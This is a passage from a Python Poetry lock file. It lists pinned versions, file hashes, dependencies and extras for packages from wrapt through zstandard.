"sha256:9ed6aa0726b9b60911f4aed8ec5b8dd7bf3491476015819f56473ffaef8959bd"}, {file = "wrapt-1.15.0-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:896689fddba4f23ef7c718279e42f8834041a21342d95e56922e1c10c0cc7afb"}, {file = "wrapt-1.15.0-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:75669d77bb2c071333417617a235324a1618dba66f82a750362eccbe5b61d248"}, {file = "wrapt-1.15.0-cp35-cp35m-win32.whl", hash = "sha256:fbec11614dba0424ca72f4e8ba3c420dba07b4a7c206c8c8e4e73f2e98f4c559"}, {file = "wrapt-1.15.0-cp35-cp35m-win_amd64.whl", hash = "sha256:fd69666217b62fa5d7c6aa88e507493a34dec4fa20c5bd925e4bc12fce586639"}, {file = "wrapt-1.15.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:b0724f05c396b0a4c36a3226c31648385deb6a65d8992644c12a4963c70326ba"}, {file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bbeccb1aa40ab88cd29e6c7d8585582c99548f55f9b2581dfc5ba68c59a85752"}, {file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:38adf7198f8f154502883242f9fe7333ab05a5b02de7d83aa2d88ea621f13364"}, {file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:578383d740457fa790fdf85e6d346fda1416a40549fe8db08e5e9bd281c6a475"}, {file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = 
"sha256:a4cbb9ff5795cd66f0066bdf5947f170f5d63a9274f99bdbca02fd973adcf2a8"}, {file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:af5bd9ccb188f6a5fdda9f1f09d9f4c86cc8a539bd48a0bfdc97723970348418"}, {file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:b56d5519e470d3f2fe4aa7585f0632b060d532d0696c5bdfb5e8319e1d0f69a2"}, {file = "wrapt-1.15.0-cp36-cp36m-win32.whl", hash = "sha256:77d4c1b881076c3ba173484dfa53d3582c1c8ff1f914c6461ab70c8428b796c1"}, {file = "wrapt-1.15.0-cp36-cp36m-win_amd64.whl", hash = "sha256:077ff0d1f9d9e4ce6476c1a924a3332452c1406e59d90a2cf24aeb29eeac9420"}, {file = "wrapt-1.15.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5c5aa28df055697d7c37d2099a7bc09f559d5053c3349b1ad0c39000e611d317"}, {file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3a8564f283394634a7a7054b7983e47dbf39c07712d7b177b37e03f2467a024e"}, {file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:780c82a41dc493b62fc5884fb1d3a3b81106642c5c5c78d6a0d4cbe96d62ba7e"}, {file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e169e957c33576f47e21864cf3fc9ff47c223a4ebca8960079b8bd36cb014fd0"}, {file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:b02f21c1e2074943312d03d243ac4388319f2456576b2c6023041c4d57cd7019"}, {file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:f2e69b3ed24544b0d3dbe2c5c0ba5153ce50dcebb576fdc4696d52aa22db6034"}, {file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d787272ed958a05b2c86311d3a4135d3c2aeea4fc655705f074130aa57d71653"}, {file = "wrapt-1.15.0-cp37-cp37m-win32.whl", hash = "sha256:02fce1852f755f44f95af51f69d22e45080102e9d00258053b79367d07af39c0"}, {file = "wrapt-1.15.0-cp37-cp37m-win_amd64.whl", hash = "sha256:abd52a09d03adf9c763d706df707c343293d5d106aea53483e0ec8d9e310ad5e"}, {file = "wrapt-1.15.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:cdb4f085756c96a3af04e6eca7f08b1345e94b53af8921b25c72f096e704e145"}, {file = "wrapt-1.15.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:230ae493696a371f1dbffaad3dafbb742a4d27a0afd2b1aecebe52b740167e7f"}, {file = "wrapt-1.15.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:63424c681923b9f3bfbc5e3205aafe790904053d42ddcc08542181a30a7a51bd"}, {file = "wrapt-1.15.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d6bcbfc99f55655c3d93feb7ef3800bd5bbe963a755687cbf1f490a71fb7794b"}, {file = "wrapt-1.15.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c99f4309f5145b93eca6e35ac1a988f0dc0a7ccf9ccdcd78d3c0adf57224e62f"}, {file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b130fe77361d6771ecf5a219d8e0817d61b236b7d8b37cc045172e574ed219e6"}, {file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:96177eb5645b1c6985f5c11d03fc2dbda9ad24ec0f3a46dcce91445747e15094"}, {file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d5fe3e099cf07d0fb5a1e23d399e5d4d1ca3e6dfcbe5c8570ccff3e9208274f7"}, {file = "wrapt-1.15.0-cp38-cp38-win32.whl", hash = "sha256:abd8f36c99512755b8456047b7be10372fca271bf1467a1caa88db991e7c421b"}, {file = "wrapt-1.15.0-cp38-cp38-win_amd64.whl", hash = "sha256:b06fa97478a5f478fb05e1980980a7cdf2712015493b44d0c87606c1513ed5b1"}, {file = 
"wrapt-1.15.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2e51de54d4fb8fb50d6ee8327f9828306a959ae394d3e01a1ba8b2f937747d86"}, {file = "wrapt-1.15.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:0970ddb69bba00670e58955f8019bec4a42d1785db3faa043c33d81de2bf843c"}, {file = "wrapt-1.15.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:76407ab327158c510f44ded207e2f76b657303e17cb7a572ffe2f5a8a48aa04d"}, {file = "wrapt-1.15.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:cd525e0e52a5ff16653a3fc9e3dd827981917d34996600bbc34c05d048ca35cc"}, {file = "wrapt-1.15.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9d37ac69edc5614b90516807de32d08cb8e7b12260a285ee330955604ed9dd29"}, {file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:078e2a1a86544e644a68422f881c48b84fef6d18f8c7a957ffd3f2e0a74a0d4a"}, {file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:2cf56d0e237280baed46f0b5316661da892565ff58309d4d2ed7dba763d984b8"}, {file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:7dc0713bf81287a00516ef43137273b23ee414fe41a3c14be10dd95ed98a2df9"}, {file = "wrapt-1.15.0-cp39-cp39-win32.whl", hash = "sha256:46ed616d5fb42f98630ed70c3529541408166c22cdfd4540b88d5f21006b0eff"}, {file = "wrapt-1.15.0-cp39-cp39-win_amd64.whl", hash = "sha256:eef4d64c650f33347c1f9266fa5ae001440b232ad9b98f1f43dfe7a79435c0a6"}, {file = "wrapt-1.15.0-py3-none-any.whl", hash = "sha256:64b1df0f83706b4ef4cfb4fb0e4c2669100fd7ecacfb59e091fad300d4e04640"}, {file = "wrapt-1.15.0.tar.gz", hash = "sha256:d06730c6aed78cee4126234cf2d071e01b44b915e725a6cb439a879ec9754a3a"}, ] [[package]] name = "xata" version = "1.2.0" description = "Python SDK for Xata.io" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "xata-1.2.0-py3-none-any.whl", hash = "sha256:a3710a273c0b64464080e332e24a1754a7fc9076a4117af558353c57f25c23e1"}, {file = "xata-1.2.0.tar.gz", hash = "sha256:048bf24c8aa3d09241dbe9f2a31513ce62c75c06ea3aa5822f000d2eac116462"}, ] [package.dependencies] deprecation = ">=2.1.0,<3.0.0" orjson = ">=3.8.1,<4.0.0" python-dotenv = ">=0.21,<2.0" requests = ">=2.28.1,<3.0.0" [[package]] name = "xformers" version = "0.0.16" description = "XFormers: A collection of composable Transformer building blocks." 
optional = true python-versions = ">=3.7" files = [ {file = "xformers-0.0.16-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:a64a77663258b696bef3986488cd7df4f35e320355a7fe0bf86e8eff41726f0e"}, {file = "xformers-0.0.16-cp310-cp310-win_amd64.whl", hash = "sha256:302294fa8ae34c2a4602fd13ef7aceb71111e02b4e373c6366580a5159fec8e8"}, {file = "xformers-0.0.16-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:4f4ff62e7a8d66d6ab96c70f7f6c75e0e48a22e0484cf03b4506312c5e6e1806"}, {file = "xformers-0.0.16-cp37-cp37m-win_amd64.whl", hash = "sha256:e7263225564593abfbdfa3638fa3171be7214787bf47c5f476beb48369353d78"}, {file = "xformers-0.0.16-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:a8b34e99b7cd6928a446bb02fd54665bfe8e7c3ec796c41a739b656e7c5f2473"}, {file = "xformers-0.0.16-cp38-cp38-win_amd64.whl", hash = "sha256:07efbf5188fb1ef05cd16c93e4a6d9ac4992a1e5296fd432aeeb151ea24b40d0"}, {file = "xformers-0.0.16-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:d1538e14fe7759ddc3c7a51c94a4d7a9395d63e7b9baa5e14f1d4c0b04242c12"}, {file = "xformers-0.0.16-cp39-cp39-win_amd64.whl", hash = "sha256:ca67b6f25de878e4c816849cc7e6fa46bb675a429f151b1b66e4b10769ba7173"}, {file = "xformers-0.0.16.tar.gz", hash = "sha256:92c7f0556a68f4486492691b3f567140ee192b563d904185b6669b1f8bb8ae53"}, ] [package.dependencies] numpy = "*" pyre-extensions = "0.0.23" torch = "1.13.1" [[package]] name = "xmltodict" version = "0.13.0" description = "Makes working with XML feel like you are working with JSON" optional = true python-versions = ">=3.4" files = [ {file = "xmltodict-0.13.0-py2.py3-none-any.whl", hash = "sha256:aa89e8fd76320154a40d19a0df04a4695fb9dc5ba977cbb68ab3e4eb225e7852"}, {file = "xmltodict-0.13.0.tar.gz", hash = "sha256:341595a488e3e01a85a9d8911d8912fd922ede5fecc4dce437eb4b6c8d037e56"}, ] [[package]] name = "yarl" version = "1.9.2" description = "Yet another URL library" optional = false python-versions = ">=3.7" files = [ {file = "yarl-1.9.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8c2ad583743d16ddbdf6bb14b5cd76bf43b0d0006e918809d5d4ddf7bde8dd82"}, {file = "yarl-1.9.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:82aa6264b36c50acfb2424ad5ca537a2060ab6de158a5bd2a72a032cc75b9eb8"}, {file = "yarl-1.9.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c0c77533b5ed4bcc38e943178ccae29b9bcf48ffd1063f5821192f23a1bd27b9"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ee4afac41415d52d53a9833ebae7e32b344be72835bbb589018c9e938045a560"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9bf345c3a4f5ba7f766430f97f9cc1320786f19584acc7086491f45524a551ac"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2a96c19c52ff442a808c105901d0bdfd2e28575b3d5f82e2f5fd67e20dc5f4ea"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:891c0e3ec5ec881541f6c5113d8df0315ce5440e244a716b95f2525b7b9f3608"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c3a53ba34a636a256d767c086ceb111358876e1fb6b50dfc4d3f4951d40133d5"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:566185e8ebc0898b11f8026447eacd02e46226716229cea8db37496c8cdd26e0"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:2b0738fb871812722a0ac2154be1f049c6223b9f6f22eec352996b69775b36d4"}, {file = 
"yarl-1.9.2-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:32f1d071b3f362c80f1a7d322bfd7b2d11e33d2adf395cc1dd4df36c9c243095"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:e9fdc7ac0d42bc3ea78818557fab03af6181e076a2944f43c38684b4b6bed8e3"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:56ff08ab5df8429901ebdc5d15941b59f6253393cb5da07b4170beefcf1b2528"}, {file = "yarl-1.9.2-cp310-cp310-win32.whl", hash = "sha256:8ea48e0a2f931064469bdabca50c2f578b565fc446f302a79ba6cc0ee7f384d3"}, {file = "yarl-1.9.2-cp310-cp310-win_amd64.whl", hash = "sha256:50f33040f3836e912ed16d212f6cc1efb3231a8a60526a407aeb66c1c1956dde"}, {file = "yarl-1.9.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:646d663eb2232d7909e6601f1a9107e66f9791f290a1b3dc7057818fe44fc2b6"}, {file = "yarl-1.9.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aff634b15beff8902d1f918012fc2a42e0dbae6f469fce134c8a0dc51ca423bb"}, {file = "yarl-1.9.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a83503934c6273806aed765035716216cc9ab4e0364f7f066227e1aaea90b8d0"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b25322201585c69abc7b0e89e72790469f7dad90d26754717f3310bfe30331c2"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:22a94666751778629f1ec4280b08eb11815783c63f52092a5953faf73be24191"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8ec53a0ea2a80c5cd1ab397925f94bff59222aa3cf9c6da938ce05c9ec20428d"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:159d81f22d7a43e6eabc36d7194cb53f2f15f498dbbfa8edc8a3239350f59fe7"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:832b7e711027c114d79dffb92576acd1bd2decc467dec60e1cac96912602d0e6"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:95d2ecefbcf4e744ea952d073c6922e72ee650ffc79028eb1e320e732898d7e8"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:d4e2c6d555e77b37288eaf45b8f60f0737c9efa3452c6c44626a5455aeb250b9"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:783185c75c12a017cc345015ea359cc801c3b29a2966c2655cd12b233bf5a2be"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:b8cc1863402472f16c600e3e93d542b7e7542a540f95c30afd472e8e549fc3f7"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:822b30a0f22e588b32d3120f6d41e4ed021806418b4c9f0bc3048b8c8cb3f92a"}, {file = "yarl-1.9.2-cp311-cp311-win32.whl", hash = "sha256:a60347f234c2212a9f0361955007fcf4033a75bf600a33c88a0a8e91af77c0e8"}, {file = "yarl-1.9.2-cp311-cp311-win_amd64.whl", hash = "sha256:be6b3fdec5c62f2a67cb3f8c6dbf56bbf3f61c0f046f84645cd1ca73532ea051"}, {file = "yarl-1.9.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:38a3928ae37558bc1b559f67410df446d1fbfa87318b124bf5032c31e3447b74"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ac9bb4c5ce3975aeac288cfcb5061ce60e0d14d92209e780c93954076c7c4367"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3da8a678ca8b96c8606bbb8bfacd99a12ad5dd288bc6f7979baddd62f71c63ef"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:13414591ff516e04fcdee8dc051c13fd3db13b673c7a4cb1350e6b2ad9639ad3"}, {file 
= "yarl-1.9.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bf74d08542c3a9ea97bb8f343d4fcbd4d8f91bba5ec9d5d7f792dbe727f88938"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6e7221580dc1db478464cfeef9b03b95c5852cc22894e418562997df0d074ccc"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:494053246b119b041960ddcd20fd76224149cfea8ed8777b687358727911dd33"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:52a25809fcbecfc63ac9ba0c0fb586f90837f5425edfd1ec9f3372b119585e45"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:e65610c5792870d45d7b68c677681376fcf9cc1c289f23e8e8b39c1485384185"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:1b1bba902cba32cdec51fca038fd53f8beee88b77efc373968d1ed021024cc04"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:662e6016409828ee910f5d9602a2729a8a57d74b163c89a837de3fea050c7582"}, {file = "yarl-1.9.2-cp37-cp37m-win32.whl", hash = "sha256:f364d3480bffd3aa566e886587eaca7c8c04d74f6e8933f3f2c996b7f09bee1b"}, {file = "yarl-1.9.2-cp37-cp37m-win_amd64.whl", hash = "sha256:6a5883464143ab3ae9ba68daae8e7c5c95b969462bbe42e2464d60e7e2698368"}, {file = "yarl-1.9.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5610f80cf43b6202e2c33ba3ec2ee0a2884f8f423c8f4f62906731d876ef4fac"}, {file = "yarl-1.9.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b9a4e67ad7b646cd6f0938c7ebfd60e481b7410f574c560e455e938d2da8e0f4"}, {file = "yarl-1.9.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:83fcc480d7549ccebe9415d96d9263e2d4226798c37ebd18c930fce43dfb9574"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5fcd436ea16fee7d4207c045b1e340020e58a2597301cfbcfdbe5abd2356c2fb"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:84e0b1599334b1e1478db01b756e55937d4614f8654311eb26012091be109d59"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3458a24e4ea3fd8930e934c129b676c27452e4ebda80fbe47b56d8c6c7a63a9e"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:838162460b3a08987546e881a2bfa573960bb559dfa739e7800ceeec92e64417"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f4e2d08f07a3d7d3e12549052eb5ad3eab1c349c53ac51c209a0e5991bbada78"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:de119f56f3c5f0e2fb4dee508531a32b069a5f2c6e827b272d1e0ff5ac040333"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:149ddea5abf329752ea5051b61bd6c1d979e13fbf122d3a1f9f0c8be6cb6f63c"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:674ca19cbee4a82c9f54e0d1eee28116e63bc6fd1e96c43031d11cbab8b2afd5"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:9b3152f2f5677b997ae6c804b73da05a39daa6a9e85a512e0e6823d81cdad7cc"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:5415d5a4b080dc9612b1b63cba008db84e908b95848369aa1da3686ae27b6d2b"}, {file = "yarl-1.9.2-cp38-cp38-win32.whl", hash = "sha256:f7a3d8146575e08c29ed1cd287068e6d02f1c7bdff8970db96683b9591b86ee7"}, {file = "yarl-1.9.2-cp38-cp38-win_amd64.whl", hash = "sha256:63c48f6cef34e6319a74c727376e95626f84ea091f92c0250a98e53e62c77c72"}, {file = 
"yarl-1.9.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:75df5ef94c3fdc393c6b19d80e6ef1ecc9ae2f4263c09cacb178d871c02a5ba9"}, {file = "yarl-1.9.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c027a6e96ef77d401d8d5a5c8d6bc478e8042f1e448272e8d9752cb0aff8b5c8"}, {file = "yarl-1.9.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f3b078dbe227f79be488ffcfc7a9edb3409d018e0952cf13f15fd6512847f3f7"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:59723a029760079b7d991a401386390c4be5bfec1e7dd83e25a6a0881859e716"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b03917871bf859a81ccb180c9a2e6c1e04d2f6a51d953e6a5cdd70c93d4e5a2a"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c1012fa63eb6c032f3ce5d2171c267992ae0c00b9e164efe4d73db818465fac3"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a74dcbfe780e62f4b5a062714576f16c2f3493a0394e555ab141bf0d746bb955"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8c56986609b057b4839968ba901944af91b8e92f1725d1a2d77cbac6972b9ed1"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:2c315df3293cd521033533d242d15eab26583360b58f7ee5d9565f15fee1bef4"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:b7232f8dfbd225d57340e441d8caf8652a6acd06b389ea2d3222b8bc89cbfca6"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:53338749febd28935d55b41bf0bcc79d634881195a39f6b2f767870b72514caf"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:066c163aec9d3d073dc9ffe5dd3ad05069bcb03fcaab8d221290ba99f9f69ee3"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:8288d7cd28f8119b07dd49b7230d6b4562f9b61ee9a4ab02221060d21136be80"}, {file = "yarl-1.9.2-cp39-cp39-win32.whl", hash = "sha256:b124e2a6d223b65ba8768d5706d103280914d61f5cae3afbc50fc3dfcc016623"}, {file = "yarl-1.9.2-cp39-cp39-win_amd64.whl", hash = "sha256:61016e7d582bc46a5378ffdd02cd0314fb8ba52f40f9cf4d9a5e7dbef88dee18"}, {file = "yarl-1.9.2.tar.gz", hash = "sha256:04ab9d4b9f587c06d801c2abfe9317b77cdf996c65a90d5e84ecc45010823571"}, ] [package.dependencies] idna = ">=2.0" multidict = ">=4.0" [[package]] name = "zipp" version = "3.17.0" description = "Backport of pathlib-compatible object wrapper for zip files" optional = false python-versions = ">=3.8" files = [ {file = "zipp-3.17.0-py3-none-any.whl", hash = "sha256:0e923e726174922dce09c53c59ad483ff7bbb8e572e00c7f7c46b88556409f31"}, {file = "zipp-3.17.0.tar.gz", hash = "sha256:84e64a1c28cf7e91ed2078bb8cc8c259cb19b76942096c8d7b84947690cabaf0"}, ] [package.extras] docs = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (<7.2.5)", "sphinx (>=3.5)", "sphinx-lint"] testing = ["big-O", "jaraco.functools", "jaraco.itertools", "more-itertools", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-ignore-flaky", "pytest-mypy (>=0.9.1)", "pytest-ruff"] [[package]] name = "zstandard" version = "0.21.0" description = "Zstandard bindings for Python" optional = true python-versions = ">=3.7" files = [ {file = "zstandard-0.21.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:649a67643257e3b2cff1c0a73130609679a5673bf389564bc6d4b164d822a7ce"}, {file = 
"zstandard-0.21.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:144a4fe4be2e747bf9c646deab212666e39048faa4372abb6a250dab0f347a29"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b72060402524ab91e075881f6b6b3f37ab715663313030d0ce983da44960a86f"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8257752b97134477fb4e413529edaa04fc0457361d304c1319573de00ba796b1"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:c053b7c4cbf71cc26808ed67ae955836232f7638444d709bfc302d3e499364fa"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2769730c13638e08b7a983b32cb67775650024632cd0476bf1ba0e6360f5ac7d"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:7d3bc4de588b987f3934ca79140e226785d7b5e47e31756761e48644a45a6766"}, {file = "zstandard-0.21.0-cp310-cp310-win32.whl", hash = "sha256:67829fdb82e7393ca68e543894cd0581a79243cc4ec74a836c305c70a5943f07"}, {file = "zstandard-0.21.0-cp310-cp310-win_amd64.whl", hash = "sha256:e6048a287f8d2d6e8bc67f6b42a766c61923641dd4022b7fd3f7439e17ba5a4d"}, {file = "zstandard-0.21.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7f2afab2c727b6a3d466faee6974a7dad0d9991241c498e7317e5ccf53dbc766"}, {file = "zstandard-0.21.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ff0852da2abe86326b20abae912d0367878dd0854b8931897d44cfeb18985472"}, {file = "zstandard-0.21.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d12fa383e315b62630bd407477d750ec96a0f438447d0e6e496ab67b8b451d39"}, {file = "zstandard-0.21.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f1b9703fe2e6b6811886c44052647df7c37478af1b4a1a9078585806f42e5b15"}, {file = "zstandard-0.21.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:df28aa5c241f59a7ab524f8ad8bb75d9a23f7ed9d501b0fed6d40ec3064784e8"}, {file = "zstandard-0.21.0-cp311-cp311-win32.whl", hash = "sha256:0aad6090ac164a9d237d096c8af241b8dcd015524ac6dbec1330092dba151657"}, {file = "zstandard-0.21.0-cp311-cp311-win_amd64.whl", hash = 